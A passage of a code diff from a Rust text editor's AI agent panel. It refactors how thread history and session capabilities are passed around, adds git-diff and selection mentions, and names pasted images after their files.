};
use language::language_settings::SoftWrap;
-use project::Project;
+use project::{AgentId, Project};
use prompt_store::PromptStore;
use rope::Point;
use settings::Settings as _;
@@ -20,18 +20,17 @@ use theme::ThemeSettings;
use ui::{Context, TextSize};
use workspace::Workspace;
-use crate::message_editor::{MessageEditor, MessageEditorEvent};
+use crate::message_editor::{MessageEditor, MessageEditorEvent, SharedSessionCapabilities};
pub struct EntryViewState {
workspace: WeakEntity<Workspace>,
project: WeakEntity<Project>,
thread_store: Option<Entity<ThreadStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
entries: Vec<Entry>,
- prompt_capabilities: Rc<RefCell<acp::PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<acp::AvailableCommand>>>,
- agent_name: SharedString,
+ session_capabilities: SharedSessionCapabilities,
+ agent_id: AgentId,
}
impl EntryViewState {
@@ -39,11 +38,10 @@ impl EntryViewState {
workspace: WeakEntity<Workspace>,
project: WeakEntity<Project>,
thread_store: Option<Entity<ThreadStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
- prompt_capabilities: Rc<RefCell<acp::PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<acp::AvailableCommand>>>,
- agent_name: SharedString,
+ session_capabilities: SharedSessionCapabilities,
+ agent_id: AgentId,
) -> Self {
Self {
workspace,
@@ -52,9 +50,8 @@ impl EntryViewState {
history,
prompt_store,
entries: Vec::new(),
- prompt_capabilities,
- available_commands,
- agent_name,
+ session_capabilities,
+ agent_id,
}
}
@@ -94,9 +91,8 @@ impl EntryViewState {
self.thread_store.clone(),
self.history.clone(),
self.prompt_store.clone(),
- self.prompt_capabilities.clone(),
- self.available_commands.clone(),
- self.agent_name.clone(),
+ self.session_capabilities.clone(),
+ self.agent_id.clone(),
"Edit message - @ to include context",
editor::EditorMode::AutoHeight {
min_lines: 1,
@@ -227,7 +223,10 @@ impl EntryViewState {
} else {
self.set_entry(
index,
- Entry::AssistantMessage(AssistantMessageEntry::default()),
+ Entry::AssistantMessage(AssistantMessageEntry {
+ scroll_handles_by_chunk_index: HashMap::default(),
+ focus_handle: cx.focus_handle(),
+ }),
);
let Some(Entry::AssistantMessage(entry)) = self.entries.get_mut(index) else {
unreachable!()
@@ -291,9 +290,10 @@ pub enum ViewEvent {
},
}
-#[derive(Default, Debug)]
+#[derive(Debug)]
pub struct AssistantMessageEntry {
scroll_handles_by_chunk_index: HashMap<usize, ScrollHandle>,
+ focus_handle: FocusHandle,
}
impl AssistantMessageEntry {
@@ -326,7 +326,8 @@ impl Entry {
pub fn focus_handle(&self, cx: &App) -> Option<FocusHandle> {
match self {
Self::UserMessage(editor) => Some(editor.read(cx).focus_handle(cx)),
- Self::AssistantMessage(_) | Self::ToolCall(_) => None,
+ Self::AssistantMessage(message) => Some(message.focus_handle.clone()),
+ Self::ToolCall(_) => None,
}
}
@@ -453,6 +454,7 @@ fn diff_editor_text_style_refinement(cx: &mut App) -> TextStyleRefinement {
mod tests {
use std::path::Path;
use std::rc::Rc;
+ use std::sync::Arc;
use acp_thread::{AgentConnection, StubAgentConnection};
use agent_client_protocol as acp;
@@ -460,15 +462,17 @@ mod tests {
use editor::RowInfo;
use fs::FakeFs;
use gpui::{AppContext as _, TestAppContext};
+ use parking_lot::RwLock;
use crate::entry_view_state::EntryViewState;
+ use crate::message_editor::SessionCapabilities;
use multi_buffer::MultiBufferRow;
use pretty_assertions::assert_matches;
use project::Project;
use serde_json::json;
use settings::SettingsStore;
use util::path;
- use workspace::MultiWorkspace;
+ use workspace::{MultiWorkspace, PathList};
#[gpui::test]
async fn test_diff_sync(cx: &mut TestAppContext) {
@@ -495,9 +499,11 @@ mod tests {
let connection = Rc::new(StubAgentConnection::new());
let thread = cx
.update(|_, cx| {
- connection
- .clone()
- .new_session(project.clone(), Path::new(path!("/project")), cx)
+ connection.clone().new_session(
+ project.clone(),
+ PathList::new(&[Path::new(path!("/project"))]),
+ cx,
+ )
})
.await
.unwrap();
@@ -508,18 +514,16 @@ mod tests {
});
let thread_store = None;
- let history =
- cx.update(|window, cx| cx.new(|cx| crate::ThreadHistory::new(None, window, cx)));
+ let history: Option<gpui::WeakEntity<crate::ThreadHistory>> = None;
let view_state = cx.new(|_cx| {
EntryViewState::new(
workspace.downgrade(),
project.downgrade(),
thread_store,
- history.downgrade(),
+ history,
None,
- Default::default(),
- Default::default(),
+ Arc::new(RwLock::new(SessionCapabilities::default())),
"Test Agent".into(),
)
});
@@ -266,7 +266,7 @@ impl InlineAssistant {
return;
};
- let configuration_error = || {
+ let configuration_error = |cx| {
let model_registry = LanguageModelRegistry::read_global(cx);
model_registry.configuration_error(model_registry.inline_assistant_model(), cx)
};
@@ -278,7 +278,11 @@ impl InlineAssistant {
let prompt_store = agent_panel.prompt_store().as_ref().cloned();
let thread_store = agent_panel.thread_store().clone();
- let history = agent_panel.history().downgrade();
+ let history = agent_panel
+ .connection_store()
+ .read(cx)
+ .entry(&crate::Agent::NativeAgent)
+ .and_then(|s| s.read(cx).history().cloned());
let handle_assist =
|window: &mut Window, cx: &mut Context<Workspace>| match inline_assist_target {
@@ -290,7 +294,7 @@ impl InlineAssistant {
workspace.project().downgrade(),
thread_store,
prompt_store,
- history,
+ history.as_ref().map(|h| h.downgrade()),
action.prompt.clone(),
window,
cx,
@@ -305,7 +309,7 @@ impl InlineAssistant {
workspace.project().downgrade(),
thread_store,
prompt_store,
- history,
+ history.as_ref().map(|h| h.downgrade()),
action.prompt.clone(),
window,
cx,
@@ -314,7 +318,7 @@ impl InlineAssistant {
}
};
- if let Some(error) = configuration_error() {
+ if let Some(error) = configuration_error(cx) {
if let ConfigurationError::ProviderNotAuthenticated(provider) = error {
cx.spawn(async move |_, cx| {
cx.update(|cx| provider.authenticate(cx)).await?;
@@ -322,7 +326,7 @@ impl InlineAssistant {
})
.detach_and_log_err(cx);
- if configuration_error().is_none() {
+ if configuration_error(cx).is_none() {
handle_assist(window, cx);
}
} else {
@@ -487,7 +491,7 @@ impl InlineAssistant {
project: WeakEntity<Project>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
initial_prompt: Option<String>,
window: &mut Window,
codegen_ranges: &[Range<Anchor>],
@@ -626,7 +630,7 @@ impl InlineAssistant {
project: WeakEntity<Project>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
initial_prompt: Option<String>,
window: &mut Window,
cx: &mut App,
@@ -671,7 +675,7 @@ impl InlineAssistant {
workspace: Entity<Workspace>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
window: &mut Window,
cx: &mut App,
) -> InlineAssistId {
@@ -1969,7 +1973,15 @@ impl CodeActionProvider for AssistantCodeActionProvider {
.panel::<AgentPanel>(cx)
.context("missing agent panel")?
.read(cx);
- anyhow::Ok((panel.thread_store().clone(), panel.history().downgrade()))
+
+ let history = panel
+ .connection_store()
+ .read(cx)
+ .entry(&crate::Agent::NativeAgent)
+ .and_then(|e| e.read(cx).history())
+ .map(|h| h.downgrade());
+
+ anyhow::Ok((panel.thread_store().clone(), history))
})??;
let editor = editor.upgrade().context("editor was released")?;
let range = editor
@@ -2138,7 +2150,7 @@ pub mod test {
setup(cx);
- let (_editor, buffer, _history) = cx.update(|window, cx| {
+ let (_editor, buffer) = cx.update(|window, cx| {
let buffer = cx.new(|cx| Buffer::local("", cx));
let multibuffer = cx.new(|cx| MultiBuffer::singleton(buffer.clone(), cx));
let editor = cx.new(|cx| Editor::for_multibuffer(multibuffer, None, window, cx));
@@ -2155,7 +2167,6 @@ pub mod test {
});
let thread_store = cx.new(|cx| ThreadStore::new(cx));
- let history = cx.new(|cx| crate::ThreadHistory::new(None, window, cx));
// Add editor to workspace
workspace.update(cx, |workspace, cx| {
@@ -2171,7 +2182,7 @@ pub mod test {
project.downgrade(),
thread_store,
None,
- history.downgrade(),
+ None,
Some(prompt),
window,
cx,
@@ -2181,7 +2192,7 @@ pub mod test {
inline_assistant.start_assist(assist_id, window, cx);
});
- (editor, buffer, history)
+ (editor, buffer)
});
cx.run_until_parked();
@@ -64,7 +64,7 @@ pub struct PromptEditor<T> {
pub editor: Entity<Editor>,
mode: PromptEditorMode,
mention_set: Entity<MentionSet>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
workspace: WeakEntity<Workspace>,
model_selector: Entity<AgentModelSelector>,
@@ -796,9 +796,11 @@ impl<T: 'static> PromptEditor<T> {
vec![
Button::new("start", mode.start_label())
.label_size(LabelSize::Small)
- .icon(IconName::Return)
- .icon_size(IconSize::XSmall)
- .icon_color(Color::Muted)
+ .end_icon(
+ Icon::new(IconName::Return)
+ .size(IconSize::XSmall)
+ .color(Color::Muted),
+ )
.on_click(
cx.listener(|_, _, _, cx| cx.emit(PromptEditorEvent::StartRequested)),
)
@@ -1225,7 +1227,7 @@ impl PromptEditor<BufferCodegen> {
fs: Arc<dyn Fs>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
project: WeakEntity<Project>,
workspace: WeakEntity<Workspace>,
window: &mut Window,
@@ -1384,7 +1386,7 @@ impl PromptEditor<TerminalCodegen> {
fs: Arc<dyn Fs>,
thread_store: Entity<ThreadStore>,
prompt_store: Option<Entity<PromptStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
project: WeakEntity<Project>,
workspace: WeakEntity<Workspace>,
window: &mut Window,
@@ -147,10 +147,19 @@ impl MentionSet {
include_errors,
include_warnings,
} => self.confirm_mention_for_diagnostics(include_errors, include_warnings, cx),
+ MentionUri::GitDiff { base_ref } => {
+ self.confirm_mention_for_git_diff(base_ref.into(), cx)
+ }
+ MentionUri::Selection {
+ abs_path: Some(abs_path),
+ line_range,
+ } => self.confirm_mention_for_symbol(abs_path, line_range, cx),
+ MentionUri::Selection { abs_path: None, .. } => Task::ready(Err(anyhow!(
+ "Untitled buffer selection mentions are not supported for paste"
+ ))),
MentionUri::PastedImage
- | MentionUri::Selection { .. }
| MentionUri::TerminalSelection { .. }
- | MentionUri::GitDiff { .. } => {
+ | MentionUri::MergeConflict { .. } => {
Task::ready(Err(anyhow!("Unsupported mention URI type for paste")))
}
}
@@ -297,9 +306,12 @@ impl MentionSet {
debug_panic!("unexpected terminal URI");
Task::ready(Err(anyhow!("unexpected terminal URI")))
}
- MentionUri::GitDiff { .. } => {
- debug_panic!("unexpected git diff URI");
- Task::ready(Err(anyhow!("unexpected git diff URI")))
+ MentionUri::GitDiff { base_ref } => {
+ self.confirm_mention_for_git_diff(base_ref.into(), cx)
+ }
+ MentionUri::MergeConflict { .. } => {
+ debug_panic!("unexpected merge conflict URI");
+ Task::ready(Err(anyhow!("unexpected merge conflict URI")))
}
};
let task = cx
@@ -548,19 +560,17 @@ impl MentionSet {
project.read(cx).fs().clone(),
thread_store,
));
- let delegate = AgentServerDelegate::new(
- project.read(cx).agent_server_store().clone(),
- project.clone(),
- None,
- None,
- );
- let connection = server.connect(delegate, cx);
+ let delegate =
+ AgentServerDelegate::new(project.read(cx).agent_server_store().clone(), None);
+ let connection = server.connect(delegate, project.clone(), cx);
cx.spawn(async move |_, cx| {
let agent = connection.await?;
let agent = agent.downcast::<agent::NativeAgentConnection>().unwrap();
let summary = agent
.0
- .update(cx, |agent, cx| agent.thread_summary(id, cx))
+ .update(cx, |agent, cx| {
+ agent.thread_summary(id, project.clone(), cx)
+ })
.await?;
Ok(Mention::Text {
content: summary.to_string(),
@@ -599,6 +609,42 @@ impl MentionSet {
})
})
}
+
+ pub fn confirm_mention_for_git_diff(
+ &self,
+ base_ref: SharedString,
+ cx: &mut Context<Self>,
+ ) -> Task<Result<Mention>> {
+ let Some(project) = self.project.upgrade() else {
+ return Task::ready(Err(anyhow!("project not found")));
+ };
+
+ let Some(repo) = project.read(cx).active_repository(cx) else {
+ return Task::ready(Err(anyhow!("no active repository")));
+ };
+
+ let diff_receiver = repo.update(cx, |repo, cx| {
+ repo.diff(
+ git::repository::DiffType::MergeBase { base_ref: base_ref },
+ cx,
+ )
+ });
+
+ cx.spawn(async move |_, _| {
+ let diff_text = diff_receiver.await??;
+ if diff_text.is_empty() {
+ Ok(Mention::Text {
+ content: "No changes found in branch diff.".into(),
+ tracked_buffers: Vec::new(),
+ })
+ } else {
+ Ok(Mention::Text {
+ content: diff_text,
+ tracked_buffers: Vec::new(),
+ })
+ }
+ })
+ }
}
#[cfg(test)]
@@ -649,12 +695,51 @@ mod tests {
"Unexpected error: {error:#}"
);
}
+
+ #[gpui::test]
+ async fn test_selection_mentions_supported_for_paste(cx: &mut TestAppContext) {
+ init_test(cx);
+
+ let fs = FakeFs::new(cx.executor());
+ fs.insert_tree(
+ "/project",
+ json!({"file.rs": "line 1\nline 2\nline 3\nline 4\n"}),
+ )
+ .await;
+ let project = Project::test(fs, [Path::new(path!("/project"))], cx).await;
+ let mention_set = cx.new(|_cx| MentionSet::new(project.downgrade(), None, None));
+
+ let mention_task = mention_set.update(cx, |mention_set, cx| {
+ let http_client = project.read(cx).client().http_client();
+ mention_set.confirm_mention_for_uri(
+ MentionUri::Selection {
+ abs_path: Some(path!("/project/file.rs").into()),
+ line_range: 1..=2,
+ },
+ false,
+ http_client,
+ cx,
+ )
+ });
+
+ let mention = mention_task.await.unwrap();
+ match mention {
+ Mention::Text {
+ content,
+ tracked_buffers,
+ } => {
+ assert_eq!(content, "line 2\nline 3\n");
+ assert_eq!(tracked_buffers.len(), 1);
+ }
+ other => panic!("Expected selection mention to resolve as text, got {other:?}"),
+ }
+ }
}
/// Inserts a list of images into the editor as context mentions.
/// This is the shared implementation used by both paste and file picker operations.
pub(crate) async fn insert_images_as_context(
- images: Vec<gpui::Image>,
+ images: Vec<(gpui::Image, SharedString)>,
editor: Entity<Editor>,
mention_set: Entity<MentionSet>,
workspace: WeakEntity<Workspace>,
@@ -666,7 +751,7 @@ pub(crate) async fn insert_images_as_context(
let replacement_text = MentionUri::PastedImage.as_link().to_string();
- for image in images {
+ for (image, name) in images {
let Some((excerpt_id, text_anchor, multibuffer_anchor)) = editor
.update_in(cx, |editor, window, cx| {
let snapshot = editor.snapshot(window, cx);
@@ -700,7 +785,7 @@ pub(crate) async fn insert_images_as_context(
excerpt_id,
text_anchor,
content_len,
- MentionUri::PastedImage.name().into(),
+ name.clone(),
IconName::Image.path().into(),
None,
None,
@@ -758,12 +843,24 @@ pub(crate) fn paste_images_as_context(
cx: &mut App,
) -> Option<Task<()>> {
let clipboard = cx.read_from_clipboard()?;
+
+ // Only handle paste if the first clipboard entry is an image or file path.
+ // If text comes first, return None so the caller falls through to text paste.
+ // This respects the priority order set by the source application.
+ if matches!(
+ clipboard.entries().first(),
+ Some(ClipboardEntry::String(_)) | None
+ ) {
+ return None;
+ }
+
Some(window.spawn(cx, async move |mut cx| {
use itertools::Itertools;
- let (mut images, paths) = clipboard
+ let default_name: SharedString = MentionUri::PastedImage.name().into();
+ let (mut images, paths): (Vec<(gpui::Image, SharedString)>, Vec<_>) = clipboard
.into_entries()
.filter_map(|entry| match entry {
- ClipboardEntry::Image(image) => Some(Either::Left(image)),
+ ClipboardEntry::Image(image) => Some(Either::Left((image, default_name.clone()))),
ClipboardEntry::ExternalPaths(paths) => Some(Either::Right(paths)),
_ => None,
})
@@ -774,24 +871,32 @@ pub(crate) fn paste_images_as_context(
cx.background_spawn(async move {
let mut images = vec![];
for path in paths.into_iter().flat_map(|paths| paths.paths().to_owned()) {
- let Ok(content) = async_fs::read(path).await else {
+ let Ok(content) = async_fs::read(&path).await else {
continue;
};
let Ok(format) = image::guess_format(&content) else {
continue;
};
- images.push(gpui::Image::from_bytes(
- match format {
- image::ImageFormat::Png => gpui::ImageFormat::Png,
- image::ImageFormat::Jpeg => gpui::ImageFormat::Jpeg,
- image::ImageFormat::WebP => gpui::ImageFormat::Webp,
- image::ImageFormat::Gif => gpui::ImageFormat::Gif,
- image::ImageFormat::Bmp => gpui::ImageFormat::Bmp,
- image::ImageFormat::Tiff => gpui::ImageFormat::Tiff,
- image::ImageFormat::Ico => gpui::ImageFormat::Ico,
- _ => continue,
- },
- content,
+ let name: SharedString = path
+ .file_name()
+ .and_then(|n| n.to_str())
+ .map(|s| SharedString::from(s.to_owned()))
+ .unwrap_or_else(|| default_name.clone());
+ images.push((
+ gpui::Image::from_bytes(
+ match format {
+ image::ImageFormat::Png => gpui::ImageFormat::Png,
+ image::ImageFormat::Jpeg => gpui::ImageFormat::Jpeg,
+ image::ImageFormat::WebP => gpui::ImageFormat::Webp,
+ image::ImageFormat::Gif => gpui::ImageFormat::Gif,
+ image::ImageFormat::Bmp => gpui::ImageFormat::Bmp,
+ image::ImageFormat::Tiff => gpui::ImageFormat::Tiff,
+ image::ImageFormat::Ico => gpui::ImageFormat::Ico,
+ _ => continue,
+ },
+ content,
+ ),
+ name,
));
}
images
@@ -800,12 +905,9 @@ pub(crate) fn paste_images_as_context(
);
}
- cx.update(|_window, cx| {
- cx.stop_propagation();
- })
- .ok();
-
- insert_images_as_context(images, editor, mention_set, workspace, &mut cx).await;
+ if !images.is_empty() {
+ insert_images_as_context(images, editor, mention_set, workspace, &mut cx).await;
+ }
}))
}
@@ -1,3 +1,4 @@
+use crate::DEFAULT_THREAD_TITLE;
use crate::SendImmediately;
use crate::ThreadHistory;
use crate::{
@@ -14,81 +15,78 @@ use acp_thread::MentionUri;
use agent::ThreadStore;
use agent_client_protocol as acp;
use anyhow::{Result, anyhow};
-use collections::HashSet;
use editor::{
- Addon, AnchorRangeExt, ContextMenuOptions, ContextMenuPlacement, Editor, EditorElement,
- EditorEvent, EditorMode, EditorStyle, Inlay, MultiBuffer, MultiBufferOffset,
- MultiBufferSnapshot, ToOffset, actions::Paste, code_context_menus::CodeContextMenu,
- scroll::Autoscroll,
+ Addon, AnchorRangeExt, ContextMenuOptions, Editor, EditorElement, EditorEvent, EditorMode,
+ EditorStyle, Inlay, MultiBuffer, MultiBufferOffset, MultiBufferSnapshot, ToOffset,
+ actions::Paste, code_context_menus::CodeContextMenu, scroll::Autoscroll,
};
use futures::{FutureExt as _, future::join_all};
use gpui::{
AppContext, ClipboardEntry, Context, Entity, EventEmitter, FocusHandle, Focusable, ImageFormat,
KeyContext, SharedString, Subscription, Task, TextStyle, WeakEntity,
};
-use language::{Buffer, Language, language_settings::InlayHintKind};
+use language::{Buffer, language_settings::InlayHintKind};
+use parking_lot::RwLock;
+use project::AgentId;
use project::{CompletionIntent, InlayHint, InlayHintLabel, InlayId, Project, Worktree};
use prompt_store::PromptStore;
use rope::Point;
use settings::Settings;
-use std::{cell::RefCell, fmt::Write, ops::Range, rc::Rc, sync::Arc};
+use std::{fmt::Write, ops::Range, rc::Rc, sync::Arc};
use theme::ThemeSettings;
-use ui::{ButtonLike, ButtonStyle, ContextMenu, Disclosure, ElevationIndex, prelude::*};
+use ui::{ContextMenu, Disclosure, ElevationIndex, prelude::*};
use util::paths::PathStyle;
use util::{ResultExt, debug_panic};
use workspace::{CollaboratorId, Workspace};
use zed_actions::agent::{Chat, PasteRaw};
-pub struct MessageEditor {
- mention_set: Entity<MentionSet>,
- editor: Entity<Editor>,
- workspace: WeakEntity<Workspace>,
- prompt_capabilities: Rc<RefCell<acp::PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<acp::AvailableCommand>>>,
- agent_name: SharedString,
- thread_store: Option<Entity<ThreadStore>>,
- _subscriptions: Vec<Subscription>,
- _parse_slash_command_task: Task<()>,
+#[derive(Default)]
+pub struct SessionCapabilities {
+ prompt_capabilities: acp::PromptCapabilities,
+ available_commands: Vec<acp::AvailableCommand>,
}
-#[derive(Clone, Debug)]
-pub enum MessageEditorEvent {
- Send,
- SendImmediately,
- Cancel,
- Focus,
- LostFocus,
- InputAttempted(Arc<str>),
-}
+impl SessionCapabilities {
+ pub fn new(
+ prompt_capabilities: acp::PromptCapabilities,
+ available_commands: Vec<acp::AvailableCommand>,
+ ) -> Self {
+ Self {
+ prompt_capabilities,
+ available_commands,
+ }
+ }
-impl EventEmitter<MessageEditorEvent> for MessageEditor {}
+ pub fn supports_images(&self) -> bool {
+ self.prompt_capabilities.image
+ }
-const COMMAND_HINT_INLAY_ID: InlayId = InlayId::Hint(0);
+ pub fn supports_embedded_context(&self) -> bool {
+ self.prompt_capabilities.embedded_context
+ }
-impl PromptCompletionProviderDelegate for Entity<MessageEditor> {
- fn supports_images(&self, cx: &App) -> bool {
- self.read(cx).prompt_capabilities.borrow().image
+ pub fn available_commands(&self) -> &[acp::AvailableCommand] {
+ &self.available_commands
}
- fn supported_modes(&self, cx: &App) -> Vec<PromptContextType> {
+ fn supported_modes(&self, has_thread_store: bool) -> Vec<PromptContextType> {
let mut supported = vec![PromptContextType::File, PromptContextType::Symbol];
- if self.read(cx).prompt_capabilities.borrow().embedded_context {
- if self.read(cx).thread_store.is_some() {
+ if self.prompt_capabilities.embedded_context {
+ if has_thread_store {
supported.push(PromptContextType::Thread);
}
supported.extend(&[
PromptContextType::Diagnostics,
PromptContextType::Fetch,
PromptContextType::Rules,
+ PromptContextType::BranchDiff,
]);
}
supported
}
- fn available_commands(&self, cx: &App) -> Vec<crate::completion_provider::AvailableCommand> {
- self.read(cx)
- .available_commands
- .borrow()
+ pub fn completion_commands(&self) -> Vec<crate::completion_provider::AvailableCommand> {
+ self.available_commands
.iter()
.map(|cmd| crate::completion_provider::AvailableCommand {
name: cmd.name.clone().into(),
@@ -98,36 +96,97 @@ impl PromptCompletionProviderDelegate for Entity<MessageEditor> {
.collect()
}
+ pub fn set_prompt_capabilities(&mut self, prompt_capabilities: acp::PromptCapabilities) {
+ self.prompt_capabilities = prompt_capabilities;
+ }
+
+ pub fn set_available_commands(&mut self, available_commands: Vec<acp::AvailableCommand>) {
+ self.available_commands = available_commands;
+ }
+}
+
+pub type SharedSessionCapabilities = Arc<RwLock<SessionCapabilities>>;
+
+struct MessageEditorCompletionDelegate {
+ session_capabilities: SharedSessionCapabilities,
+ has_thread_store: bool,
+ message_editor: WeakEntity<MessageEditor>,
+}
+
+impl PromptCompletionProviderDelegate for MessageEditorCompletionDelegate {
+ fn supports_images(&self, _cx: &App) -> bool {
+ self.session_capabilities.read().supports_images()
+ }
+
+ fn supported_modes(&self, _cx: &App) -> Vec<PromptContextType> {
+ self.session_capabilities
+ .read()
+ .supported_modes(self.has_thread_store)
+ }
+
+ fn available_commands(&self, _cx: &App) -> Vec<crate::completion_provider::AvailableCommand> {
+ self.session_capabilities.read().completion_commands()
+ }
+
fn confirm_command(&self, cx: &mut App) {
- self.update(cx, |this, cx| this.send(cx));
+ let _ = self.message_editor.update(cx, |this, cx| this.send(cx));
}
}
+pub struct MessageEditor {
+ mention_set: Entity<MentionSet>,
+ editor: Entity<Editor>,
+ workspace: WeakEntity<Workspace>,
+ session_capabilities: SharedSessionCapabilities,
+ agent_id: AgentId,
+ thread_store: Option<Entity<ThreadStore>>,
+ _subscriptions: Vec<Subscription>,
+ _parse_slash_command_task: Task<()>,
+}
+
+#[derive(Clone, Debug)]
+pub enum MessageEditorEvent {
+ Send,
+ SendImmediately,
+ Cancel,
+ Focus,
+ LostFocus,
+ InputAttempted {
+ text: Arc<str>,
+ cursor_offset: usize,
+ },
+}
+
+impl EventEmitter<MessageEditorEvent> for MessageEditor {}
+
+const COMMAND_HINT_INLAY_ID: InlayId = InlayId::Hint(0);
+
impl MessageEditor {
pub fn new(
workspace: WeakEntity<Workspace>,
project: WeakEntity<Project>,
thread_store: Option<Entity<ThreadStore>>,
- history: WeakEntity<ThreadHistory>,
+ history: Option<WeakEntity<ThreadHistory>>,
prompt_store: Option<Entity<PromptStore>>,
- prompt_capabilities: Rc<RefCell<acp::PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<acp::AvailableCommand>>>,
- agent_name: SharedString,
+ session_capabilities: SharedSessionCapabilities,
+ agent_id: AgentId,
placeholder: &str,
mode: EditorMode,
window: &mut Window,
cx: &mut Context<Self>,
) -> Self {
- let language = Language::new(
- language::LanguageConfig {
- completion_query_characters: HashSet::from_iter(['.', '-', '_', '@']),
- ..Default::default()
- },
- None,
- );
+ let language_registry = project
+ .upgrade()
+ .map(|project| project.read(cx).languages().clone());
let editor = cx.new(|cx| {
- let buffer = cx.new(|cx| Buffer::local("", cx).with_language(Arc::new(language), cx));
+ let buffer = cx.new(|cx| {
+ let buffer = Buffer::local("", cx);
+ if let Some(language_registry) = language_registry.as_ref() {
+ buffer.set_language_registry(language_registry.clone());
+ }
+ buffer
+ });
let buffer = cx.new(|cx| MultiBuffer::singleton(buffer, cx));
let mut editor = Editor::new(mode, buffer, None, window, cx);
@@ -139,7 +198,7 @@ impl MessageEditor {
editor.set_context_menu_options(ContextMenuOptions {
min_entries_visible: 12,
max_entries_visible: 12,
- placement: Some(ContextMenuPlacement::Above),
+ placement: None,
});
editor.register_addon(MessageEditorAddon::new());
@@ -163,7 +222,11 @@ impl MessageEditor {
let mention_set =
cx.new(|_cx| MentionSet::new(project, thread_store.clone(), prompt_store.clone()));
let completion_provider = Rc::new(PromptCompletionProvider::new(
- cx.entity(),
+ MessageEditorCompletionDelegate {
+ session_capabilities: session_capabilities.clone(),
+ has_thread_store: thread_store.is_some(),
+ message_editor: cx.weak_entity(),
+ },
editor.downgrade(),
mention_set.clone(),
history,
@@ -197,7 +260,15 @@ impl MessageEditor {
&& editor.read(cx).read_only(cx)
&& !text.is_empty()
{
- cx.emit(MessageEditorEvent::InputAttempted(text.clone()));
+ let editor = editor.read(cx);
+ let cursor_anchor = editor.selections.newest_anchor().head();
+ let cursor_offset = cursor_anchor
+ .to_offset(&editor.buffer().read(cx).snapshot(cx))
+ .0;
+ cx.emit(MessageEditorEvent::InputAttempted {
+ text: text.clone(),
+ cursor_offset,
+ });
}
if let EditorEvent::Edited { .. } = event
@@ -229,31 +300,45 @@ impl MessageEditor {
}
}));
+ if let Some(language_registry) = language_registry {
+ let editor = editor.clone();
+ cx.spawn(async move |_, cx| {
+ let markdown = language_registry.language_for_name("Markdown").await?;
+ editor.update(cx, |editor, cx| {
+ if let Some(buffer) = editor.buffer().read(cx).as_singleton() {
+ buffer.update(cx, |buffer, cx| {
+ buffer.set_language(Some(markdown), cx);
+ });
+ }
+ });
+ anyhow::Ok(())
+ })
+ .detach_and_log_err(cx);
+ }
+
Self {
editor,
mention_set,
workspace,
- prompt_capabilities,
- available_commands,
- agent_name,
+ session_capabilities,
+ agent_id,
thread_store,
_subscriptions: subscriptions,
_parse_slash_command_task: Task::ready(()),
}
}
- pub fn set_command_state(
+ pub fn set_session_capabilities(
&mut self,
- prompt_capabilities: Rc<RefCell<acp::PromptCapabilities>>,
- available_commands: Rc<RefCell<Vec<acp::AvailableCommand>>>,
+ session_capabilities: SharedSessionCapabilities,
_cx: &mut Context<Self>,
) {
- self.prompt_capabilities = prompt_capabilities;
- self.available_commands = available_commands;
+ self.session_capabilities = session_capabilities;
}
fn command_hint(&self, snapshot: &MultiBufferSnapshot) -> Option<Inlay> {
- let available_commands = self.available_commands.borrow();
+ let session_capabilities = self.session_capabilities.read();
+ let available_commands = session_capabilities.available_commands();
if available_commands.is_empty() {
return None;
}
@@ -314,7 +399,7 @@ impl MessageEditor {
};
let thread_title = title
.filter(|title| !title.is_empty())
- .unwrap_or_else(|| SharedString::new_static("New Thread"));
+ .unwrap_or_else(|| SharedString::new_static(DEFAULT_THREAD_TITLE));
let uri = MentionUri::Thread {
id: session_id,
name: thread_title.to_string(),
@@ -333,7 +418,7 @@ impl MessageEditor {
.text_anchor
});
- let supports_images = self.prompt_capabilities.borrow().image;
+ let supports_images = self.session_capabilities.read().supports_images();
self.mention_set
.update(cx, |mention_set, cx| {
@@ -378,7 +463,7 @@ impl MessageEditor {
fn validate_slash_commands(
text: &str,
available_commands: &[acp::AvailableCommand],
- agent_name: &str,
+ agent_id: &AgentId,
) -> Result<()> {
if let Some(parsed_command) = SlashCommandCompletion::try_parse(text, 0) {
if let Some(command_name) = parsed_command.command {
@@ -391,7 +476,7 @@ impl MessageEditor {
return Err(anyhow!(
"The /{} command is not supported by {}.\n\nAvailable commands: {}",
command_name,
- agent_name,
+ agent_id,
if available_commands.is_empty() {
"none".to_string()
} else {
@@ -414,12 +499,16 @@ impl MessageEditor {
cx: &mut Context<Self>,
) -> Task<Result<(Vec<acp::ContentBlock>, Vec<Entity<Buffer>>)>> {
let text = self.editor.read(cx).text(cx);
- let available_commands = self.available_commands.borrow().clone();
- let agent_name = self.agent_name.clone();
+ let available_commands = self
+ .session_capabilities
+ .read()
+ .available_commands()
+ .to_vec();
+ let agent_id = self.agent_id.clone();
let build_task = self.build_content_blocks(full_mention_content, cx);
cx.spawn(async move |_, _cx| {
- Self::validate_slash_commands(&text, &available_commands, &agent_name)?;
+ Self::validate_slash_commands(&text, &available_commands, &agent_id)?;
build_task.await
})
}
@@ -441,7 +530,8 @@ impl MessageEditor {
.mention_set
.update(cx, |store, cx| store.contents(full_mention_content, cx));
let editor = self.editor.clone();
- let supports_embedded_context = self.prompt_capabilities.borrow().embedded_context;
+ let supports_embedded_context =
+ self.session_capabilities.read().supports_embedded_context();
